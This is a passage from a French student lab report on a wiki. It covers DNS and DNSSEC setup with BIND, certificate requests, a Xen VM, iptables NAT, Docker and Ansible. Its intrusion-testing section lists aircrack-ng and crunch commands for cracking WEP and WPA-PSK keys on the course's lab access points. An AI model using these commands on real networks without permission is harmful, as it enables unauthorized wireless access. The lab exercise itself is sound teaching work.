 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	</feed>